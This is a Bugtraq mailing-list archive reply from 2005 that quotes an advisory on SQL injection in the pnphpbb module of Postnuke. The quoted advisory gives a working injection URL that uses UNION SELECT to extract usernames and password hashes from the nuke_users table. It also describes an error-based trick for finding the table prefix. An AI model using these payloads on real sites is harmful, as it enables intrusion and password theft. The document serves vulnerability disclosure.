Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]
From: Maksymilian Arciemowicz <max () jestsuper pl>
Date: 2 Mar 2005 00:18:24 -0000
In-Reply-To: <20050301221521.7282.qmail () www securityfocus com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]

Author: Jocanor
Date: 01-03-2k5


1. -----------introduction--------.

Postnuke is an open source CMS (content management system), originally based in php-nuke. (www.postnuke.com)

pnphpbb is a module for postnuke based in popular forum system phpbb. (www.phpbb.com)

2. ------------the bug------------

in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file described in the bugtraq id 9984 and the 
bug affects also to php-nuke; butraq privades exploits for exploit this bug in php-nuke and phpbb.

But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and its easy to exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql
here]

3 -------- the exploit ----------

Working exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*

Show password hash for the user with uid = 2.

4. ------important notes-----

Note: if don't works, changue the prefix nuke_ for the valid prefix, you can get the valid table prefix causing an 
error like this:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'


5----- Contact -----

Author: Jocanor 
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS

EOF.



Frist check http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2650
etc.

This is sql injection in phpbb. Old sql injection..

Author: Maksymilian Arciemowicz
Email: cxib[at]securityreason[dot].com
GPG-KEY: http://securityreason/gpg/key.gpg
SECURITYREASON.COM TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCJKMFznmvyJCR4zQRAsvMAJ9Qus2ukYRx6Y/dXMxuVb2+xwSl2QCgnyUZ
d2TP6nXTXqx+yWettkbfYuE=
=nsYW
-----END PGP SIGNATURE-----

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]